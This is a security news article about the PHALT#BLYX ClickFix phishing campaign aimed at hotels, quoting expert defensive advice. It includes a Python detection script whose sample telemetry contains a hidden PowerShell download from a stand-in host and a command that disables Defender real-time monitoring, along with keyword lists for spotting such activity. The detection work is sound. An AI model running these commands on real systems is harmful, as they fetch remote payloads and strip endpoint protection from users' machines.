Fake Booking.com Emails, Fake BSODs: Inside a Stealthy ClickFix Campaign
Thu | Jan 8, 2026 | 5:22 AM PST

Cybercriminals are increasingly proving they don’t need software vulnerabilities to compromise organizations — they need convincing deception.

Researchers at Securonix are warning of a sophisticated phishing campaign targeting the hospitality sector that uses fake Booking.com reservation cancellations, deceptive CAPTCHA pages, and a panic-inducing fake Windows Blue Screen of Death (BSOD) to deploy a remote access trojan (RAT). The campaign, dubbed PHALT#BLYX, highlights how attackers are blending social engineering with trusted system tools to bypass traditional security controls.

From booking cancellation to system compromise

The attack chain begins with a phishing email masquerading as a Booking.com reservation cancellation notice. The message includes realistic room charge details in euros and references a charge or refund exceeding €1,000—a deliberate tactic to create urgency and prompt victims to click.

According to Securonix, the campaign relies on a ClickFix-style social engineering pattern to move victims from a simple phishing email to executing malware. In its analysis, the company notes:

"An ongoing malware campaign tracked as PHALT#BLYX has been identified as a multi-stage infection chain that begins with the click-fix and fake captcha social engineering tactic and deploys a customized DCRat payload.… The final payload is a heavily obfuscated version of DCRat, capable of process hollowing, keylogging, persistent remote access and dropping secondary payloads."

Once a victim clicks the phishing link, they are redirected to an impersonating website that initially displays a fake CAPTCHA or browser error. Clicking a "Reload" button triggers the next stage of the attack, where the browser enters full-screen mode and displays a convincing BSOD animation.

The fake error message instructs the user to enter a sequence of keystrokes that ultimately runs PowerShell commands. Those commands download a malicious MSBuild project file, allowing the attackers to continue the infection using legitimate Windows tooling.

Living off the land with trusted tools

The campaign's use of MSBuild.exe, a legitimate Microsoft build utility, is central to its stealth. Once downloaded, the malicious project file is compiled and executed by MSBuild, resulting in Windows Defender being disabled, persistence mechanisms being established, and the execution of a customized .NET-based DCRat payload.

Securonix researchers observed that the malware checks the current user's privileges and, if administrative access is not present, attempts privilege escalation using User Account Control (UAC) prompt spam. The final payload is designed for resilience and long-term access, allowing attackers to monitor activity, steal credentials, and deploy additional malware.

"This PHALT#BLYX activity is a good example of where attackers don't require a vulnerability for exploitation," said Christopher Jess, Senior R&D Manager at Black Duck. "By combining a fake Booking.com cancellation lure with a bogus CAPTCHA and a panic-inducing BSOD, the campaign uses the ClickFix pattern to coax a user into running PowerShell themselves, then leans on built-in tools by abusing trusted Windows tooling like MSBuild.exe to compile and run the next stage."

Jess noted that this blend of social engineering and living-off-the-land techniques is intentionally designed to evade security controls that focus on detecting clearly malicious executables.

Why ClickFix is gaining momentum

Security teams should not assume this technique will remain confined to the hospitality sector.

"Organizations should assume this technique will spread," Jess warned. "ClickFix has already shown broad adoption across threat actors, lures, and geographies because it's low cost to retheme and it relies on user execution rather than a single vulnerable product. What looks like a hospitality problem today can become shipping, HR, or finance tomorrow with the same playbook."

Securonix noted that the campaign primarily targeted European hospitality organizations in late December 2025—a timing that coincides with peak travel season and reduced staffing, when employees are more likely to act quickly on booking-related messages.

Browser abuse enables deception

The fake BSOD plays a critical role in convincing victims that something is seriously wrong and that immediate action is required.

"Displaying a fullscreen BSOD is a key part of tricking the user here," said Lionel Litty, CISO and Chief Security Architect at Menlo Security. "Perhaps surprisingly, a website can enter fullscreen mode without requiring a browser permission prompt. The only prerequisite is a user action that demonstrates the user is interacting with the page."

In this campaign, simply clicking "Reload" is enough to grant the attacker the visual control needed to convincingly impersonate a system-level error—underscoring how powerful browser APIs can be when abused by malicious actors.

Desktop today, mobile tomorrow

While PHALT#BLYX currently focuses on desktop systems, experts warn that the same techniques are already being adapted for mobile delivery.

"Campaigns such as this highlight how attackers increasingly rely on social engineering and trusted brand impersonation to bypass traditional controls—and these tactics don't stop at desktops," said Kern Smith, Senior Vice President of Global Solutions Engineering at Zimperium. "We routinely see the same lures adapted for mobile delivery, where phishing links, fake CAPTCHAs, and malicious redirects are even harder for users to detect."

Smith added that a mobile-first strategy allows attackers to bypass perimeter, email, and network defenses entirely by pushing users to interact directly with malicious content on devices where visibility and enforcement are often weaker.

How organizations can break the chain

Defending against ClickFix-style attacks requires focusing on controls organizations actually own.

Jess recommends breaking the attack chain at three key points: people, privileges, and permitted tools. That includes training employees never to run commands simply because a webpage or "verification screen" instructs them to do so; restricting developer tools like MSBuild to systems that genuinely require them; reducing local administrator privileges; and monitoring for suspicious process chains—such as a browser spawning PowerShell and then MSBuild.

Finally, organizations should treat RAT deployment as a serious incident with follow-on risk.

"These tools usually mean someone's poking around, stealing credentials, or setting up more attacks," Jess said. Indicators such as disabled Defender settings, unexpected persistence mechanisms, anomalous MSBuild activity, or unusual outbound traffic should trigger immediate investigation, isolation of affected systems, and credential resets.
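The process-chain monitoring Jess recommends (a browser or the Run dialog spawning PowerShell, which then spawns MSBuild) and the indicators listed above (Defender preferences being changed, MSBuild compiling a project out of a temp directory) can be expressed as a handful of rules over process-creation telemetry. The following is an added illustration written for this article, not code from Securonix, Black Duck or SecureWorld; the event fields loosely mirror Sysmon Event ID 1 (process creation), the rule names are invented, and the sample events, paths and the `example.invalid` host are constructed rather than real indicators. It treats explorer.exe as an interactive launcher alongside browsers because the Win+R "Run" dialog that ClickFix lures direct users to is hosted by explorer.exe.

```python
"""Process-chain and tamper-indicator checks for the PHALT#BLYX pattern.

Added illustration, not code from Securonix, Black Duck or SecureWorld.
Events are constructed to loosely mirror Sysmon Event ID 1 (process
creation) fields; a real pipeline would feed in EDR or Sysmon records.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# The Win+R "Run" dialog that ClickFix lures point users at is hosted by
# explorer.exe, so it counts as an interactive launcher alongside browsers.
INTERACTIVE_LAUNCHERS = BROWSERS | {"explorer.exe"}

DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring",
                    "downloadfile", "curl ", "bitsadmin")
DEFENDER_TAMPER_MARKERS = ("set-mppreference", "add-mppreference",
                           "disablerealtimemonitoring")
USER_WRITABLE_DIRS = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\public\\")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable basename as logged
    cmdline: str


def build_index(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestry(index: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Return [process, parent, grandparent, ...]; stops at a missing or cyclic parent."""
    chain: List[ProcEvent] = []
    seen = set()
    cur = index.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = index.get(cur.ppid)
    return chain


def find_alerts(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Apply four rules and return (rule_name, pid) pairs in event order."""
    index = build_index(events)
    alerts: List[Tuple[str, int]] = []
    for e in events:
        img = e.image.lower()
        cl = e.cmdline.lower()
        chain = ancestry(index, e.pid)

        # Rule 1: a shell started from a browser or the Run dialog that
        # immediately fetches something is the ClickFix "paste this" stage.
        if img in SHELLS and len(chain) > 1 and chain[1].image.lower() in INTERACTIVE_LAUNCHERS:
            if any(m in cl for m in DOWNLOAD_MARKERS):
                alerts.append(("clickfix_shell_download", e.pid))

        if img == "msbuild.exe":
            # Rule 2: MSBuild reached through a shell that an interactive
            # launcher started (browser -> PowerShell -> MSBuild, or via Run).
            for i in range(1, len(chain) - 1):
                if chain[i].image.lower() in SHELLS and \
                        chain[i + 1].image.lower() in INTERACTIVE_LAUNCHERS:
                    alerts.append(("interactive_shell_to_msbuild", e.pid))
                    break
            # Rule 3: a build tool compiling a project out of a user-writable
            # directory; legitimate builds run from source trees.
            if any(d in cl for d in USER_WRITABLE_DIRS):
                alerts.append(("msbuild_project_in_user_writable_path", e.pid))

        # Rule 4: any process changing Defender preferences.
        if any(m in cl for m in DEFENDER_TAMPER_MARKERS):
            alerts.append(("defender_tamper", e.pid))
    return alerts


# Constructed sample telemetry (not real indicators): one ClickFix-style
# chain through the Run dialog and one ordinary developer build for contrast.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "msedge.exe", "msedge.exe --profile-directory=Default"),
    ProcEvent(300, 100, "powershell.exe",
              'powershell.exe -w hidden -c "iwr http://example.invalid/p.xml -OutFile $env:TEMP\\p.xml"'),
    ProcEvent(400, 300, "MSBuild.exe", "MSBuild.exe C:\\Users\\u\\AppData\\Local\\Temp\\p.xml"),
    ProcEvent(500, 400, "powershell.exe",
              'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcEvent(600, 100, "Code.exe", "Code.exe"),
    ProcEvent(700, 600, "MSBuild.exe", "MSBuild.exe C:\\src\\app\\app.csproj"),
]

if __name__ == "__main__":
    for rule, pid in find_alerts(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid}")
```

Run stand-alone, the script flags the shell download (pid 300), the shell-to-MSBuild chain and the temp-directory project (pid 400) and the Defender change (pid 500), while the developer build launched from an editor (pid 700) produces nothing. Rule 2 on its own will also match a developer running MSBuild from a console they opened, which is why the user-writable-path and download-marker rules are kept separate: an alert that trips two or more of them at once is the high-confidence signal, and the MSBuild restriction Jess recommends removes the benign matches on hosts that never build software.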

A familiar lesson, evolving tactics

PHALT#BLYX reinforces a familiar reality for defenders: attackers are increasingly winning by exploiting human behavior rather than technical weaknesses. By combining trusted brands, browser-based deception, and legitimate system tools, threat actors are creating attacks that are harder to detect, easier to scale, and effective across industries.

For security teams, the challenge isn't just stopping malware—it's recognizing when seemingly normal tools and workflows are quietly weaponized against them.

Follow SecureWorld News for more stories related to cybersecurity.
